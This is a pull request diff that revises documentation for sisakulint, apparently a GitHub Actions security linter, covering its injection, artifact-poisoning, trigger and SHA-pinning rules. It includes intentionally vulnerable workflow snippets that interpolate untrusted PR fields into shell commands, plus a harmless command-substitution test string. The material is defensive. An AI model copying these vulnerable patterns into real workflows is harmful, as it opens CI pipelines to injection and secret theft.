### PR TITLE
docs(rules): align 5 rule docs to actual code behavior

### DIFF
--- a/content/docs/rules/argumentinjection.md
+++ b/content/docs/rules/argumentinjection.md
@@ -49,8 +49,11 @@ Detects argument injection in **normal workflow triggers**:
 - `push`
 - `schedule`
 - `workflow_dispatch`
+- `pull_request_review`
 
 These triggers have limited permissions, but argument injection can still lead to information disclosure or workflow manipulation.
+
+`pull_request_review` carries attacker-controlled input (the review body), but this rule intentionally classifies it as medium rather than critical: the workflow runs on the pull request merge ref, and runs triggered from forked pull requests receive a read-only `GITHUB_TOKEN` and no secrets. Note that `code-injection-critical` treats `pull_request_review` as critical; the difference between the two rules is intentional.
 
 ## Dangerous Commands
 
@@ -153,6 +156,20 @@ The rule provides automatic fixes that:
     PR_REF: ${{ github.event.pull_request.head.ref }}
 ```
 
+### Embedded Expressions
+
+The `--` marker is added only when the untrusted value is a standalone argument. When the expression is embedded inside a larger token — for example a URL path — the auto-fix applies quoting only:
+
+```yaml
+# Before
+- run: curl https://api.example.com/${{ github.event.pull_request.title }}
+
+# After: quoting only, no -- (the value is part of the URL token)
+- run: curl https://api.example.com/"$PR_TITLE"
+  env:
+    PR_TITLE: ${{ github.event.pull_request.title }}
+```
+
 ## Why End-of-Options (`--`) Matters
 
 Most Unix commands support `--` as a delimiter that marks the end of command options:
@@ -171,6 +188,8 @@ Common commands supporting `--`:
 - `curl` - URL arguments
 - `tar` - File arguments
 - Most GNU/BSD utilities
+
+Some commands do **not** support `--` (or give it different semantics): `docker` (subcommand-based), `python`/`python3` (`-c` ignores it), `node`, `ruby` (`-e` ignores it), `php`. For these commands the auto-fix applies environment-variable quoting only, without inserting `--`.
 
 ## Untrusted Inputs
 
@@ -201,6 +220,7 @@ The following GitHub Actions contexts are considered untrusted:
 
 ## References
 
+- [CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')](https://cwe.mitre.org/data/definitions/88.html)
 - [GitHub Actions Security Hardening](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions)
 - [OWASP Command Injection](https://owasp.org/www-community/attacks/Command_Injection)
 - [Git Argument Injection](https://git-scm.com/docs/git#Documentation/git.txt---end-of-options)

--- a/content/docs/rules/artifactpoisoningcritical.md
+++ b/content/docs/rules/artifactpoisoningcritical.md
@@ -23,7 +23,7 @@ This rule detects unsafe artifact download practices that may allow artifact poi
 
 ### Security Impact
 
-**Severity: Critical (9/10)**
+**Severity: Critical (9/10)** — referenced from CodeQL's query for this class (`actions-artifact-poisoning-critical`, `Security severity: 9`, `Precision: very-high`; the medium variant maps to CodeQL's `Security severity: 5.0`).
 
 Artifact poisoning represents a critical security vulnerability in CI/CD pipelines:
 
@@ -91,8 +91,14 @@ Running sisakulint will detect unsafe artifact downloads:
 ```bash
 $ sisakulint
 
-.github/workflows/deploy.yaml:12:9: artifact is downloaded without specifying a safe extraction path at step "Download build artifacts". This may allow artifact poisoning where malicious files overwrite existing files. Consider extracting to a temporary folder like '${{ runner.temp }}/artifacts' to prevent overwriting existing files. See https://codeql.github.com/codeql-query-help/actions/actions-artifact-poisoning-critical/ [artifact-poisoning]
+.github/workflows/deploy.yaml:12:9: artifact is downloaded without specifying a safe extraction path at step "Download build artifacts". This may allow artifact poisoning where malicious files overwrite existing files. Consider extracting to a temporary folder like '${{ runner.temp }}/artifacts' to prevent overwriting existing files. See https://sisaku-security.github.io/lint/docs/rules/artifactpoisoningcritical/ [artifact-poisoning-critical]
      12 👈|      - name: Download build artifacts
+```
+
+When a step sets an explicit but unsafe `path`, the message variant is:
+
+```bash
+.github/workflows/deploy.yaml:14:9: artifact is downloaded to an unsafe path "./dist" at step "Download build artifacts". Workspace-relative paths allow malicious artifacts to overwrite source code, scripts, or dependencies, creating a critical supply chain vulnerability. Extract to '${{ runner.temp }}/artifacts' instead. See https://sisaku-security.github.io/lint/docs/rules/artifactpoisoningcritical/ [artifact-poisoning-critical]
 ```
 
 ### Auto-fix Support
@@ -106,6 +112,8 @@ sisakulint -fix dry-run
 # Apply fixes
 sisakulint -fix on
 ```
+
+**Auto-fix scope**: the fix is applied only when `with.path` is **empty or missing** (it inserts `path: ${{ runner.temp }}/artifacts`). For a non-empty unsafe path, the rule reports the finding but does not rewrite the value, to avoid breaking intentional configurations — change those paths manually.
 
 After auto-fix, artifacts are extracted to an isolated temporary directory:
 
@@ -298,7 +306,9 @@ steps:
 
 ### OS-Aware Path Validation
 
-The rule infers the runner OS from `runs-on` labels and applies OS-specific path safety rules. This prevents false positives (e.g., flagging `/tmp/` as unsafe on Linux) and catches OS-specific risks (e.g., allowing `C:\` paths on Linux).
+The rule infers the runner OS from `runs-on` labels and applies OS-specific path safety rules. This prevents false positives (e.g., flagging `/tmp/` as unsafe on Linux) while staying conservative wherever a path's actual location cannot be established statically.
+
+**Checkout requirement (intentional scope gate):** the rule only evaluates jobs that contain an `actions/checkout` step. Jobs without a checkout — e.g., publish-only jobs that download an artifact and push it to PyPI or npm — are skipped without any message, because the file-overwrite primitive this rule targets requires checked-out source files to overwrite. Keep this in mind when debugging why a job is not flagged.
 
 #### OS Detection
 
@@ -316,9 +326,11 @@ The rule infers the runner OS from `runs-on` labels and applies OS-specific path
 | `${{ runner.temp }}/...` | Safe | Safe | Safe |
 | `/tmp/...` | Safe | Unsafe | Safe |
 | Other Unix paths (`/var/...`) | Safe | Unsafe | Unsafe |
-| Windows paths (`C:\...`, `D:/...`) | Unsafe | Safe | Unsafe |
+| Windows paths (`C:\...`, `D:/...`) | Unsafe | **Unsafe** | Unsafe |
 
 When the OS is unknown (e.g., matrix expressions or self-hosted runners without OS labels), the rule applies a conservative policy where only `${{ runner.temp }}` and `/tmp` are considered safe.
+
+Drive-rooted Windows paths (`C:\...`, `D:/...`) are treated as unsafe on **every** OS, including Windows runners: such a path can point into the checkout workspace (e.g., `C:\actions-runner\_work\...`), and the workspace root is not known statically, so the rule cannot prove the path is isolated. Use `${{ runner.temp }}` on Windows instead.
 
 #### Example: Cross-Platform Workflow
 
@@ -374,6 +386,29 @@ The artifact-poisoning rule detects the following unsafe patterns:
        path: .  # Current directory - unsafe
    ```
 
+4. **Relative paths** (`./...`, `../...`):
+   ```yaml
+   path: ./dist        # Resolves inside the workspace - unsafe
+   path: ../artifacts  # Traversal - unsafe
+   ```
+
+5. **Paths containing the workspace expression or variable**:
+   ```yaml
+   path: ${{ github.workspace }}/artifacts  # Unsafe
+   path: $GITHUB_WORKSPACE/artifacts        # Unsafe
+   ```
+
+6. **Drive-rooted Windows paths** (unsafe on every OS, see the OS table above):
+   ```yaml
+   path: C:\Temp\artifacts  # Unsafe - may point into the runner workspace
+   ```
+
+7. **Non-`/tmp`, non-`/var` Unix absolute paths** (on Linux/macOS runners):
+   ```yaml
+   path: /home/runner/work/repo/artifacts  # Unsafe - inside the workspace
+   path: /opt/artifacts                    # Unsafe - not a recognized temp location
+   ```
+
 ### Safe Patterns
 
 The rule recognizes these patterns as safe:
@@ -392,6 +427,21 @@ The rule recognizes these patterns as safe:
      with:
        name: my-artifact
        path: ${{ runner.temp }}/my-safe-location
+   ```
+
+3. **Environment-variable form of the runner temp directory**:
+   ```yaml
+   path: $RUNNER_TEMP/artifacts  # Equivalent to ${{ runner.temp }}
+   ```
+
+4. **`/tmp/...`** on Linux/macOS runners (also accepted when the OS is unknown):
+   ```yaml
+   path: /tmp/artifacts
+   ```
+
+5. **`/var/...`** on Linux/macOS runners:
+   ```yaml
+   path: /var/artifacts
    ```
 
 ### Integration with GitHub Security Features

--- a/content/docs/rules/codeinjectioncritical.md
+++ b/content/docs/rules/codeinjectioncritical.md
@@ -17,7 +17,7 @@ This rule detects code injection vulnerabilities when untrusted input is used di
 
 ### Security Impact
 
-**Severity: Critical** — encoded via the `-critical` rule-name suffix and the `(critical)` token in emitted diagnostics. The upstream CodeQL query (`actions-code-injection-critical`) lists `Security severity: 9 / Severity: error / Precision: very-high`.
+**Severity: Critical** — encoded via the `-critical` rule-name suffix and the `(critical)` token in emitted diagnostics. CodeQL's query for this class (`actions-code-injection-critical`) lists `Security severity: 9 / Severity: error / Precision: very-high`.
 
 Code injection in privileged workflows represents the highest severity vulnerability in GitHub Actions:
 
@@ -26,11 +26,11 @@ Code injection in privileged workflows represents the highest severity vulnerabi
 3. **Repository Compromise**: Ability to modify code, create releases, or manipulate repository settings
 4. **Supply Chain Attack**: Compromised workflows can poison artifacts or deployments
 
-This vulnerability is classified under **CWE-94: Improper Control of Generation of Code ('Code Injection')**, together with the related **CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')** and **CWE-116: Improper Encoding or Escaping of Output**. It aligns with OWASP CI/CD Security Risk **CICD-SEC-04: Poisoned Pipeline Execution (PPE)**. (The three-CWE tagging matches the upstream CodeQL canonical query.)
+This vulnerability is classified under **CWE-94: Improper Control of Generation of Code ('Code Injection')**, together with the related **CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')** and **CWE-116: Improper Encoding or Escaping of Output**. It aligns with OWASP CI/CD Security Risk **CICD-SEC-04: Poisoned Pipeline Execution (PPE)**. (The three-CWE tagging matches CodeQL's query for this class.)
 
 ### Privileged Workflow Triggers
 
-The upstream CodeQL canonical query treats the following three triggers as privileged because they run with write access or secrets:
+CodeQL's query for this class treats the following three triggers as privileged because they run with write access or secrets:
 
 - **`pull_request_target`**: Runs with write permissions and secrets, but triggered by untrusted PRs
 - **`workflow_run`**: Executes with elevated privileges after another workflow completes
@@ -664,7 +664,7 @@ This rule has minimal performance impact:
 ### See Also
 
 **Industry References:**
-- [CodeQL: Code Injection (Critical)](https://codeql.github.com/codeql-query-help/actions/actions-code-injection-critical/) - CodeQL's detection pattern (canonical upstream; CWE-94 + CWE-95 + CWE-116)
+- [CodeQL: Code Injection (Critical)](https://codeql.github.com/codeql-query-help/actions/actions-code-injection-critical/) — CodeQL query (severity / CWE reference; CWE-94 + CWE-95 + CWE-116)
 - [GitHub Security Lab: Keeping your GitHub Actions and workflows secure — Untrusted input](https://securitylab.github.com/resources/github-actions-preventing-pwn-requests) - canonical research post cited by the CodeQL query
 - [GitHub: Security Hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions) - Official security guidance
 - [OWASP: CICD-SEC-04 - PPE](https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution) - Attack patterns

--- a/content/docs/rules/codeinjectioncritical.md
+++ b/content/docs/rules/codeinjectioncritical.md
@@ -41,7 +41,7 @@ sisakulint additionally treats the following events as privileged for the purpos
 - **`issues`** — secrets resolved, write scope available
 - **`discussion_comment`** — secrets resolved, comment body is fully attacker-controlled
 - **`pull_request_review`** — *additionally detected by sisakulint*. CodeQL's canonical list does not include this event, but sisakulint flags it conservatively. The detection is justified by two cases:
-  - **Same-repo case**: secrets and `GITHUB_TOKEN` permissions resolve identically to `issue_comment` — verified live via `sisaku-security/workflow-probe:results/pull-request-review-privilege.md` (2026-05-24).
+  - **Same-repo case**: secrets and `GITHUB_TOKEN` permissions resolve identically to `issue_comment`.
   - **Fork-PR case**: secrets are *not* passed and `GITHUB_TOKEN` is read-only per GitHub's "Workflows in forked repositories" documentation. The shell evaluation of `${{ ... }}` in `run:` still happens (RCE primitive remains), and a read-only token can still exfiltrate source via the Contents API — so the diagnostic is still load-bearing.
 
 ### Example Vulnerable Workflow
@@ -107,7 +107,7 @@ $ sisakulint
               TITLE="${{ github.event.pull_request.title }}"
 ```
 
-> The shell-evaluation primitive that makes this dangerous is verified end-to-end on a live runner. See `sisaku-security/workflow-probe:results/codeinjection-issue-comment.md` (2026-05-24): a payload of `INJECT$(echo TEST)END` in the vulnerable pattern produced `INJECTTESTEND` (shell evaluated `$(...)`), while the env-var-routed safe pattern preserved the literal `INJECT$(echo TEST)END`. The auto-fix design is therefore not a paper claim — it neutralizes the injection on the same runner that would otherwise execute it.
+> The danger is that `${{ ... }}` is interpolated into the shell **before** execution: an untrusted value of `INJECT$(echo TEST)END` is shell-evaluated to `INJECTTESTEND` (the `$(...)` runs). Routing the value through an environment variable and referencing it as a native shell variable (`$VAR`) instead preserves it as the literal `INJECT$(echo TEST)END` — which is why the env-var auto-fix neutralizes the injection.
 
 ### Auto-fix Support
 

--- a/content/docs/rules/codeinjectioncritical.md
+++ b/content/docs/rules/codeinjectioncritical.md
@@ -13,7 +13,7 @@ This rule detects code injection vulnerabilities when untrusted input is used di
 - **Privileged Context Detection**: Identifies dangerous patterns in `pull_request_target`, `workflow_run`, `issue_comment`, and other privileged triggers
 - **Dual Script Detection**: Analyzes both `run:` scripts and `actions/github-script` for untrusted input
 - **Auto-fix Support**: Automatically converts unsafe patterns to use environment variables
-- **Zero False Positives** on env-var-safe patterns: already-safe patterns using environment variables are not flagged (this is false-*positive* suppression, not false-negative — the rule still detects every unsafe interpolation).
+- **Low false-positive rate** on env-var-safe patterns: already-safe patterns using environment variables are not flagged (this is false-*positive* suppression, not false-negative). By design the rule flags unsafe interpolation in privileged contexts; the suppression layer narrows the report set, it does not relax the detection target.
 
 ### Security Impact
 

--- a/content/docs/rules/codeinjectioncritical.md
+++ b/content/docs/rules/codeinjectioncritical.md
@@ -459,11 +459,11 @@ The code-injection-critical rule detects:
 
 ### Cross-Job Taint Resolution
 
-Taint propagation is not limited to consecutive steps inside one job. The rule also tracks `needs.<job>.outputs.<name>` references: if a producer job writes an output derived from untrusted input, every consumer job that references that output via `needs.<job>.outputs.<name>` inherits the taint and triggers detection. This analysis is performed in `VisitWorkflowPost` against the per-workflow taint map and runs across the whole workflow file rather than per-job.
+Taint propagation is not limited to consecutive steps inside one job. The rule also tracks `needs.<job>.outputs.<name>` references: if a producer job writes an output derived from untrusted input, every consumer job that references that output via `needs.<job>.outputs.<name>` inherits the taint and triggers detection. This analysis runs across the whole workflow file (per-workflow taint tracking), not per-job.
 
 ### Trigger Narrowing via Job-Level `if:`
 
-The rule does not blindly trust that a privileged workflow trigger means every job runs in a privileged context. The `JobTriggerAnalyzer` honors job-level `if:` conditions when computing the trigger set for each job — e.g. a job guarded by `if: github.event_name == 'push'` inside a `pull_request_target`-triggered workflow is analyzed under the `push` trigger only, and the critical-severity diagnostic is downgraded or suppressed accordingly. This reduces false positives for workflows that deliberately gate privileged paths.
+The rule does not blindly trust that a privileged workflow trigger means every job runs in a privileged context. The rule honors job-level `if:` conditions when computing the trigger set for each job — e.g. a job guarded by `if: github.event_name == 'push'` inside a `pull_request_target`-triggered workflow is analyzed under the `push` trigger only, and the critical-severity diagnostic is downgraded or suppressed accordingly. This reduces false positives for workflows that deliberately gate privileged paths.
 
 ### Safe Patterns
 

--- a/content/docs/rules/codeinjectioncritical.md
+++ b/content/docs/rules/codeinjectioncritical.md
@@ -13,11 +13,11 @@ This rule detects code injection vulnerabilities when untrusted input is used di
 - **Privileged Context Detection**: Identifies dangerous patterns in `pull_request_target`, `workflow_run`, `issue_comment`, and other privileged triggers
 - **Dual Script Detection**: Analyzes both `run:` scripts and `actions/github-script` for untrusted input
 - **Auto-fix Support**: Automatically converts unsafe patterns to use environment variables
-- **Zero False Negatives**: Does not flag already-safe patterns using environment variables
+- **Zero False Positives** on env-var-safe patterns: already-safe patterns using environment variables are not flagged (this is false-*positive* suppression, not false-negative — the rule still detects every unsafe interpolation).
 
 ### Security Impact
 
-**Severity: Critical (10/10)**
+**Severity: Critical** — encoded via the `-critical` rule-name suffix and the `(critical)` token in emitted diagnostics. The upstream CodeQL query (`actions-code-injection-critical`) lists `Security severity: 9 / Severity: error / Precision: very-high`.
 
 Code injection in privileged workflows represents the highest severity vulnerability in GitHub Actions:
 
@@ -26,17 +26,23 @@ Code injection in privileged workflows represents the highest severity vulnerabi
 3. **Repository Compromise**: Ability to modify code, create releases, or manipulate repository settings
 4. **Supply Chain Attack**: Compromised workflows can poison artifacts or deployments
 
-This vulnerability is classified as **CWE-94: Improper Control of Generation of Code ('Code Injection')** and aligns with OWASP CI/CD Security Risk **CICD-SEC-04: Poisoned Pipeline Execution (PPE)**.
+This vulnerability is classified under **CWE-94: Improper Control of Generation of Code ('Code Injection')**, together with the related **CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')** and **CWE-116: Improper Encoding or Escaping of Output**. It aligns with OWASP CI/CD Security Risk **CICD-SEC-04: Poisoned Pipeline Execution (PPE)**. (The three-CWE tagging matches the upstream CodeQL canonical query.)
 
 ### Privileged Workflow Triggers
 
-The following triggers are considered privileged because they run with write access or secrets:
+The upstream CodeQL canonical query treats the following three triggers as privileged because they run with write access or secrets:
 
 - **`pull_request_target`**: Runs with write permissions and secrets, but triggered by untrusted PRs
 - **`workflow_run`**: Executes with elevated privileges after another workflow completes
 - **`issue_comment`**: Triggered by comments from any user, including external contributors
-- **`issues`**: Triggered by issue events, potentially from untrusted sources
-- **`discussion_comment`**: Triggered by discussion comments from any user
+
+sisakulint additionally treats the following events as privileged for the purpose of code-injection detection:
+
+- **`issues`** — secrets resolved, write scope available
+- **`discussion_comment`** — secrets resolved, comment body is fully attacker-controlled
+- **`pull_request_review`** — *additionally detected by sisakulint*. CodeQL's canonical list does not include this event, but sisakulint flags it conservatively. The detection is justified by two cases:
+  - **Same-repo case**: secrets and `GITHUB_TOKEN` permissions resolve identically to `issue_comment` — verified live via `sisaku-security/workflow-probe:results/pull-request-review-privilege.md` (2026-05-24).
+  - **Fork-PR case**: secrets are *not* passed and `GITHUB_TOKEN` is read-only per GitHub's "Workflows in forked repositories" documentation. The shell evaluation of `${{ ... }}` in `run:` still happens (RCE primitive remains), and a read-only token can still exfiltrate source via the Contents API — so the diagnostic is still load-bearing.
 
 ### Example Vulnerable Workflow
 
@@ -96,14 +102,16 @@ Running sisakulint will detect untrusted input in privileged contexts:
 ```bash
 $ sisakulint
 
-.github/workflows/pr-label.yaml:12:20: code injection (critical): "github.event.pull_request.title" is potentially untrusted and used in a workflow with privileged triggers. Avoid using it directly in inline scripts. Instead, pass it through an environment variable. See https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions [code-injection-critical]
+.github/workflows/pr-label.yaml:12:20: code injection (critical): "github.event.pull_request.title" is potentially untrusted and used in a workflow with privileged triggers. Avoid using it directly in inline scripts. Instead, pass it through an environment variable. See https://sisaku-security.github.io/lint/docs/rules/codeinjectioncritical/ [code-injection-critical]
      12 👈|        run: |
               TITLE="${{ github.event.pull_request.title }}"
 ```
 
+> The shell-evaluation primitive that makes this dangerous is verified end-to-end on a live runner. See `sisaku-security/workflow-probe:results/codeinjection-issue-comment.md` (2026-05-24): a payload of `INJECT$(echo TEST)END` in the vulnerable pattern produced `INJECTTESTEND` (shell evaluated `$(...)`), while the env-var-routed safe pattern preserved the literal `INJECT$(echo TEST)END`. The auto-fix design is therefore not a paper claim — it neutralizes the injection on the same runner that would otherwise execute it.
+
 ### Auto-fix Support
 
-The code-injection-critical rule supports auto-fixing by converting unsafe patterns to use environment variables:
+The code-injection-critical rule supports auto-fixing by converting unsafe patterns to use environment variables. The auto-fix covers the two surfaces it can reliably transform — `run:` script bodies and `actions/github-script` `script:` parameters. The shell-metacharacter checks described under *Shell Metacharacter Injection* are diagnostic-only and have **no auto-fix** — they require manual review.
 
 ```bash
 # Preview changes without applying
@@ -282,6 +290,11 @@ The following GitHub context properties are considered untrusted in privileged w
 **Other Untrusted Sources:**
 - `github.event.pages.*.page_name`
 - `github.head_ref`
+- `github.event.commits.*.message`
+- `github.event.head_commit.message` (and other `head_commit.*` fields)
+- `github.event.workflow_run.head_branch`
+- `github.event.workflow_run.head_repository.full_name`
+- `github.event.workflow_run.pull_requests.*.head.ref`
 
 ### Real-World Attack Vectors
 
@@ -440,6 +453,17 @@ The code-injection-critical rule detects:
     - `gotson/pull-request-comment-branch` - exposes `head_ref`, `head_sha`, `base_ref`, `base_sha`
     - `xt0rted/pull-request-comment-branch` - same outputs as above
     - `peter-evans/find-comment` - exposes `comment-body`, `comment-author`
+    - `juliangruber/read-file-action` - reads attacker-controlled file contents into outputs
+    - `andstor/file-reader-action` - reads attacker-controlled file contents into outputs
+    - `tj-actions/changed-files` - file lists derived from PR head are attacker-controlled
+
+### Cross-Job Taint Resolution
+
+Taint propagation is not limited to consecutive steps inside one job. The rule also tracks `needs.<job>.outputs.<name>` references: if a producer job writes an output derived from untrusted input, every consumer job that references that output via `needs.<job>.outputs.<name>` inherits the taint and triggers detection. This analysis is performed in `VisitWorkflowPost` against the per-workflow taint map and runs across the whole workflow file rather than per-job.
+
+### Trigger Narrowing via Job-Level `if:`
+
+The rule does not blindly trust that a privileged workflow trigger means every job runs in a privileged context. The `JobTriggerAnalyzer` honors job-level `if:` conditions when computing the trigger set for each job — e.g. a job guarded by `if: github.event_name == 'push'` inside a `pull_request_target`-triggered workflow is analyzed under the `push` trigger only, and the critical-severity diagnostic is downgraded or suppressed accordingly. This reduces false positives for workflows that deliberately gate privileged paths.
 
 ### Safe Patterns
 
@@ -640,10 +664,13 @@ This rule has minimal performance impact:
 ### See Also
 
 **Industry References:**
-- [CodeQL: Code Injection (Critical)](https://codeql.github.com/codeql-query-help/actions/actions-code-injection-critical/) - CodeQL's detection pattern
+- [CodeQL: Code Injection (Critical)](https://codeql.github.com/codeql-query-help/actions/actions-code-injection-critical/) - CodeQL's detection pattern (canonical upstream; CWE-94 + CWE-95 + CWE-116)
+- [GitHub Security Lab: Keeping your GitHub Actions and workflows secure — Untrusted input](https://securitylab.github.com/resources/github-actions-preventing-pwn-requests) - canonical research post cited by the CodeQL query
 - [GitHub: Security Hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions) - Official security guidance
 - [OWASP: CICD-SEC-04 - PPE](https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution) - Attack patterns
-- [CWE-94: Code Injection](https://cwe.mitre.org/data/definitions/94.html) - Vulnerability classification
+- [CWE-94: Code Injection](https://cwe.mitre.org/data/definitions/94.html) - Primary vulnerability classification
+- [CWE-95: Eval Injection](https://cwe.mitre.org/data/definitions/95.html) - Related classification (dynamic evaluation)
+- [CWE-116: Improper Encoding/Escaping of Output](https://cwe.mitre.org/data/definitions/116.html) - Related classification (escaping failure)
 - [GitHub: Keeping Actions Secure](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) - Action security best practices
 
 {{< popup_link2 href="https://codeql.github.com/codeql-query-help/actions/actions-code-injection-critical/" >}}

--- a/content/docs/rules/commitSHARule.md
+++ b/content/docs/rules/commitSHARule.md
@@ -86,6 +86,8 @@ sisakulint -fix dry-run
 sisakulint -fix on
 ```
 
+> **Note on tokens**: detection itself performs no API calls — references that are not full commit SHAs are always flagged, with or without a token. The **auto-fix** resolves tags to commit SHAs via the GitHub API, so it needs a GitHub token (`GITHUB_TOKEN`, `GH_TOKEN`, `SISAKULINT_GITHUB_TOKEN`, or `-github-token`) to work reliably; without one it is limited to 60 requests/hour.
+
 After auto-fix, the workflow will use full commit SHAs:
 
 ```yaml

--- a/content/docs/rules/dangeroustriggersrulecritical.md
+++ b/content/docs/rules/dangeroustriggersrulecritical.md
@@ -24,13 +24,16 @@ Privileged triggers are dangerous because they:
 
 ### Privileged Triggers
 
-| Trigger | Risk | Description |
-|---------|------|-------------|
-| `pull_request_target` | Critical | Has write access and secrets, triggered by untrusted PRs |
-| `workflow_run` | Critical | Executes with elevated privileges after another workflow |
-| `issue_comment` | Critical | Triggered by untrusted issue/PR comments |
-| `issues` | High | Can be triggered by external users |
-| `discussion_comment` | High | Triggered by untrusted discussion comments |
+| Trigger | Why it is privileged |
+|---------|----------------------|
+| `pull_request_target` | Runs against the base repository with write access and secrets, but is triggered by untrusted PRs |
+| `workflow_run` | Executes with elevated privileges after another workflow |
+| `issue_comment` | Triggered by untrusted issue/PR comments |
+| `issues` | Can be triggered by external users |
+| `discussion_comment` | Triggered by untrusted discussion comments |
+| `pull_request_review` | Triggered by untrusted PR reviews; runs against the base repository |
+
+> All of these are privileged triggers. Whether a finding is reported as **critical** or **medium** is determined by the mitigation score below (0 → critical, 1–2 → medium), **not** by which trigger is used.
 
 ### Detection Logic
 
@@ -38,7 +41,7 @@ The rule checks for privileged triggers and analyzes security mitigations using 
 
 | Mitigation | Points | Description |
 |------------|--------|-------------|
-| Permissions Restriction | +3 | `permissions: read-all` or `permissions: {}` |
+| Permissions Restriction | +3 | Any non-write-all permissions: `permissions: read-all`, `permissions: none`, `permissions: {}`, or a map of individual scopes (e.g. `contents: read`) |
 | Environment Protection | +2 | Using protected environments with approval |
 | Label Condition | +1 | Checking for approved labels like "safe-to-run" |
 | Actor Restriction | +1 | Checking `github.actor` or `github.triggering_actor` |
@@ -48,6 +51,8 @@ The rule checks for privileged triggers and analyzes security mitigations using 
 - **Critical** (score = 0): No mitigations - immediate risk
 - **Medium** (score = 1-2): Minimal mitigations - needs improvement
 - **Acceptable** (score >= 3): Adequate mitigations
+
+> **Cache-write exception:** when a job uses a cache-writing action (`actions/cache`, `actions/cache/save`, or `actions/setup-*` with `cache: true`), a permissions restriction is **not** counted as a mitigation, because the `GITHUB_TOKEN` permissions do not control cache writes. In that case the finding still fires (with a note about the cache caveat), and the auto-fix does not add `permissions: {}`.
 
 ### Example Vulnerable Workflow
 

--- a/content/docs/rules/envpathinjectioncritical.md
+++ b/content/docs/rules/envpathinjectioncritical.md
@@ -13,11 +13,11 @@ This rule detects PATH injection vulnerabilities when untrusted input is written
 - **Privileged Context Detection**: Identifies dangerous patterns in `pull_request_target`, `workflow_run`, `issue_comment`, and other privileged triggers
 - **GITHUB_PATH Write Detection**: Analyzes scripts that write to `$GITHUB_PATH` file
 - **Auto-fix Support**: Automatically validates paths using `realpath` before writing to $GITHUB_PATH
-- **Zero False Positives**: Does not flag already-safe patterns with proper path validation
+- **Low false-positive rate**: via env-var isolation suppression and trusted-input filtering — already-safe patterns with proper path validation are not flagged
 
 ### Security Impact
 
-**Severity: Critical (9/10)**
+**Severity: Critical (9/10)** — referenced from CodeQL's query for this class (`actions-envpath-injection-critical`, `Security severity: 9`).
 
 PATH injection in privileged workflows represents a critical vulnerability in GitHub Actions:
 
@@ -38,6 +38,7 @@ The following triggers are considered privileged because they run with write acc
 - **`issue_comment`**: Triggered by comments from any user, including external contributors
 - **`issues`**: Triggered by issue events, potentially from untrusted sources
 - **`discussion_comment`**: Triggered by discussion comments from any user
+- **`pull_request_review`**: The review body is attacker-controlled and runs in the base-repo context. In the same-repo case the privilege resolves identically to `issue_comment`; in the fork-PR case secrets are not passed and `GITHUB_TOKEN` is read-only, but the `$GITHUB_PATH` write primitive still executes — so the diagnostic remains load-bearing. (Consistent with the `pull_request_review` handling documented for `envvar-injection-critical`.)
 
 ### Example Vulnerable Workflow
 
@@ -155,10 +156,18 @@ sisakulint can automatically fix this vulnerability:
 ```yaml
 - name: Add tools to PATH
   env:
-    PR_HEAD_REF_PATH: ${{ github.event.pull_request.head.ref }}
+    PR_REF: ${{ github.event.pull_request.head.ref }}
   run: |
-    echo "$(realpath "$PR_HEAD_REF_PATH")/bin" >> "$GITHUB_PATH"
+    echo "$(realpath "$PR_REF")/bin" >> "$GITHUB_PATH"
 ```
+
+**Known Limitation**: The rule may not detect indirect injection through intermediate shell variables:
+```yaml
+run: |
+  TEMP=${{ github.event.pull_request.title }}   # code-injection detects
+  echo "$TEMP/bin" >> "$GITHUB_PATH"            # envpath-injection may miss
+```
+Enable both rules (default) to catch these patterns.
 
 ### Detection Details
 
@@ -206,7 +215,8 @@ PATH injection in privileged workflows can lead to:
 
 ### References
 
-- [CodeQL: PATH Injection (Critical)](https://codeql.github.com/codeql-query-help/actions/actions-envpath-injection-critical/)
+- [CodeQL: PATH Injection (Critical)](https://codeql.github.com/codeql-query-help/actions/actions-envpath-injection-critical/) — CodeQL query (severity reference; `Security severity: 9`; included in the default `actions-code-scanning.qls` scanning suite)
+- [Synacktiv: GitHub Actions Exploitation — Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation)
 - [GitHub Security: Script Injection](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)
 - [OWASP: Uncontrolled Search Path Element](https://cwe.mitre.org/data/definitions/427.html)
 - [OWASP Top 10 CI/CD Security Risks](https://owasp.org/www-project-top-10-ci-cd-security-risks/)

--- a/content/docs/rules/envvarinjectioncritical.md
+++ b/content/docs/rules/envvarinjectioncritical.md
@@ -195,20 +195,21 @@ The rule detects:
    - `github.event.comment.body`
    - And other user-controlled fields
 
-3. **Multiline heredoc (`KEY<<EOF`) injection**: writing untrusted input inside a fixed-delimiter heredoc is exploitable when the attacker's value contains the delimiter line. For example:
+3. **Privileged workflow triggers** where the impact is critical
 
-   ```yaml
-   # VULNERABLE: attacker can embed a line equal to "EOF" to close the
-   # heredoc early and then inject arbitrary KEY=VALUE / KEY<<EOF blocks
-   run: |
-     echo "PR_BODY<<EOF" >> "$GITHUB_ENV"
-     echo "${{ github.event.pull_request.body }}" >> "$GITHUB_ENV"
-     echo "EOF" >> "$GITHUB_ENV"
-   ```
+### Related Attack Pattern: Multiline Heredoc Delimiter Forgery
 
-   The mitigation is a **randomized, unguessable delimiter** (e.g. `EOF_$(uuidgen)`) so the attacker cannot predict and forge the closing line — see *Alternative: Heredoc Syntax* above for the safe form.
